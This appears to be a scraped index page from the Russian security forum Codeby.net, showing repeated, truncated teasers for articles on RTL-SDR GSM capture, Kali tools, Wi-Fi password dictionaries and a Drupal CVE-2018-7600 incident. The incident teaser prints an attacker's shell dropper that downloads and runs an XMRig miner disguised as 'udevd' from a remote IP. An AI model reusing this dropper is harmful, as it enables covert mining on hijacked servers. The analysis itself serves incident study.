Форум информационной безопасности - Codeby.net
Статья Вторая жизнь RTL-SDR
Всем привет. На форуме не так много информации на тему программно-определяемого радио (SDR) – поэтому хочу привлечь внимание общественности к столь интересной теме и совместно начать развивать данное направление. Для меня описанная информация была нова (хоть и лежит уже два года на гитхабе) и на форуме ранее не освещалась – поэтому хочу ей поделиться.
Уважаемый Piotr Krysik, разработчик продукта для декодирования GSM сигнала ptrkrysik/gr-gsm, провел интересное исследование, позволяющее за минимальные деньги получить многоканальный радиоприемник. Как и следовало ожидать – основой стал всеми любимый RTL-SDR «свисток».
Результатом трудов стала возможность при помощи GNURadio синхронизировать несколько RTL-SDR приемников, что позволяет, например, захватывать ни один канал GSM, а несколько, объединяя вывод в единое целое. @Ondrik8 уже описал...
Уважаемый Piotr Krysik, разработчик продукта для декодирования GSM сигнала ptrkrysik/gr-gsm, провел интересное исследование, позволяющее за минимальные деньги получить многоканальный радиоприемник. Как и следовало ожидать – основой стал всеми любимый RTL-SDR «свисток».
Результатом трудов стала возможность при помощи GNURadio синхронизировать несколько RTL-SDR приемников, что позволяет, например, захватывать ни один канал GSM, а несколько, объединяя вывод в единое целое. @Ondrik8 уже описал...
Статья CVE-2018-7600 или майнер на серваке, исходники, аналитика, примеры ЧАСТЬ 2
Погнали дальше!
Как же все монетезировались? Покопавшись на серваках я начал находить одни и те же файлы с новой датой, присмотрелся - МАЙНЕР, мать его за ногу.
Все они XMRig или его форки - тык
Пробежимся по коду который их прогружает (все IP не пашут):
Башевский код, файл загружается или...
Как же все монетезировались? Покопавшись на серваках я начал находить одни и те же файлы с новой датой, присмотрелся - МАЙНЕР, мать его за ногу.
Код:
SA -
udevd
x11_kenp0le
xm111Пробежимся по коду который их прогружает (все IP не пашут):
Код:
#!/bin/sh
U="http://185.35.138.138/..."
O="http://185.35.138.138/.c"
killall -9 udevd
kill -9 'ps auwx|grep udevd|grep -v systemd|grep -v grep|awk '{ print $2 }'' 2>/dev/null
for d in 'pwd' /tmp /var/tmp /dev/shm /invalid /root /var/run; do
cd $d 2>/dev/null
if [ "$?" = "0" ]; then
cp /bin/ls . 2>/dev/null
if [ "$?" = "0" ]; then
./ls >/dev/null
if [ "$?" = "0" ]; then
rm -rf ls
rm -rf udevd ... .c
if hash curl 2>/dev/null; then
curl -s -LO "$U"
curl -s -LO "$O"
else
wget -q "$U"
wget -q "$O"
fi
mv ... udevd
chmod +x udevd
./udevd -c .c
exit
fi
fi
fi
doneБашевский код, файл загружается или...
Статья Striker - сканер для получения различной информации
Striker: Ваш первый шаг в разведке для кибербезопасностиВходите в мир кибербезопасности? Ищете надежный инструмент для сбора информации? Striker — это сканер, который поможет новичкам и профессионалам эффективно проводить разведку целей, обнаруживая важные данные, от обхода Cloudflare до анализа серверов.
Узнайте о возможностях Striker, включая сбор заголовков, фингерпринтинг ОС, обнаружение CMS, Whois, сканирование портов и создание карт атаки. Получите информацию об электронных адресах и связях сервера. Простое использование и автоматизация делают Striker идеальным выбором для быстрого старта в сборе данных.
Для всех, кто хочет начать применять практические навыки в информационной безопасности и освоить мощные инструменты разведки.Статья Поиск пакетов для Kali Linux
Источник:
В предыдущей статье мы рассмотрели . С легкостью установки, которые обеспечивает APT, у нас есть выбор среди десятков тысяч пакетов, однако оборотной стороной является то, что у нас есть десятки тысяч пакетов. Выяснить, какие пакеты доступны и найти один, которые нам нужен, может быть сложной задачей, особенно для новичков в Linux. В этой статье мы будем рассматривать три утилиты, которые могут быть использованы для поиска через haystack и помочь вам воспользоваться обширной экосистемой с открытым исходным кодом.
apt-cache
Различные интерфейсы, доступные для поиска пакетов apt-cache имеет самые основные и элементарные из всех их . Однако это также...
Архивная Nimses. Что это? И как получить с этого выгоду?
Что такое Nimses?
- Как написано на сайте "Nimses — единая мировая система, которая фиксирует и сохраняет прожитое время человеческой жизни и позволяет управлять им. После регистрации в Nimses каждая минута жизни человека превращается в один nim (ним), уникальную несгораемую цифровую запись. Общее количество нимов произведенных и полученных одним человеком, накапливаются на индивидуальном балансе, в nimb (нимбе). Человек может управлять своими нимами, используя бесплатное геолокационное приложение Nimses." или же многие думают что это лучше чем кнопка бабло(это не так)
Про Nimses и предыстория.
На начале публичного запуска(Июнь 2017 год) приложение стало очень популярным, насколько? Не буду говорить цифру скачиваний которая написана на сайте, но скажу от себя тогда я не мог зарегистрироваться, ибо всё их сервисы по рассылке сообщений с кодом были под очень сильной нагрузкой, только на 2 день у меня...
- Как написано на сайте "Nimses — единая мировая система, которая фиксирует и сохраняет прожитое время человеческой жизни и позволяет управлять им. После регистрации в Nimses каждая минута жизни человека превращается в один nim (ним), уникальную несгораемую цифровую запись. Общее количество нимов произведенных и полученных одним человеком, накапливаются на индивидуальном балансе, в nimb (нимбе). Человек может управлять своими нимами, используя бесплатное геолокационное приложение Nimses." или же многие думают что это лучше чем кнопка бабло(это не так)
Про Nimses и предыстория.
На начале публичного запуска(Июнь 2017 год) приложение стало очень популярным, насколько? Не буду говорить цифру скачиваний которая написана на сайте, но скажу от себя тогда я не мог зарегистрироваться, ибо всё их сервисы по рассылке сообщений с кодом были под очень сильной нагрузкой, только на 2 день у меня...
Статья Альтернативный метод составления словарей для атак на Wi-Fi сети
Кому известно откуда берутся существующие словари, типа "Топ 500 паролей Wi-Fi" ? Если задуматься, то они не могут никак "утечь", пароли из них не устанавливаются "по дефолту" как пароли от роутеров, нет-камер и прочего IoT-дерема. Они вообще не имеют массовый характер с точки зрения доступности и хранения. Разве что вся видящее око Google и Apple знают все пароли на планете благодаря функции "Backup and restore options". Но до сих пор известных случаев их утечек не было.
Между тем, тестировать сети мне приходилось часто и зачастую они оказывались неуязвимы к типичным атакам WEP/WPS/WPA. Тогда остается практически только перебор паролей методом грубой силы. Множество раз я подходил к процессу составления словаря для данной задачи с разных сторон. И всегда результаты оказывались не достаточно конкретизированными, скудными, а пермутации ситуацию сильно не меняли.
Однако, в итоге эта, практически...
Между тем, тестировать сети мне приходилось часто и зачастую они оказывались неуязвимы к типичным атакам WEP/WPS/WPA. Тогда остается практически только перебор паролей методом грубой силы. Множество раз я подходил к процессу составления словаря для данной задачи с разных сторон. И всегда результаты оказывались не достаточно конкретизированными, скудными, а пермутации ситуацию сильно не меняли.
Однако, в итоге эта, практически...
Статья Kali Linux. Forensic Tools
Приветствую всех пользователей и гостей Сodeby)
Специально пропустил слово форум в приветствии, ибо Codeby это уже давно больше чем просто форум, у нас есть уже мобильный клиент на андроид, на подходе МК для iOS, и скоро выйдет свой дистрибутив для пентеста, а самое главное дружное сообщество людей которым интересна тема ИБ, это я все к тому что хватит наверное тролить друг друга (камень в этот огород ) и выяснять какая операционная система лучше (камень в этот огород ), везде есть свои плюсы и минусы.
Ребята, давайте жить дружно)))
Дело было вечером, делать было нечего, и вот что из этого получилось)))
Пока CodebyOS готовится, пишем про Kali
Во многих случаях Kali Linux считается одним из самых популярных дистрибутивов в области безопасности. Kali содержит...
Специально пропустил слово форум в приветствии, ибо Codeby это уже давно больше чем просто форум, у нас есть уже мобильный клиент на андроид, на подходе МК для iOS, и скоро выйдет свой дистрибутив для пентеста, а самое главное дружное сообщество людей которым интересна тема ИБ, это я все к тому что хватит наверное тролить друг друга (камень в этот огород ) и выяснять какая операционная система лучше (камень в этот огород ), везде есть свои плюсы и минусы.
Ребята, давайте жить дружно)))
Дело было вечером, делать было нечего, и вот что из этого получилось)))
Пока CodebyOS готовится, пишем про Kali
Во многих случаях Kali Linux считается одним из самых популярных дистрибутивов в области безопасности. Kali содержит...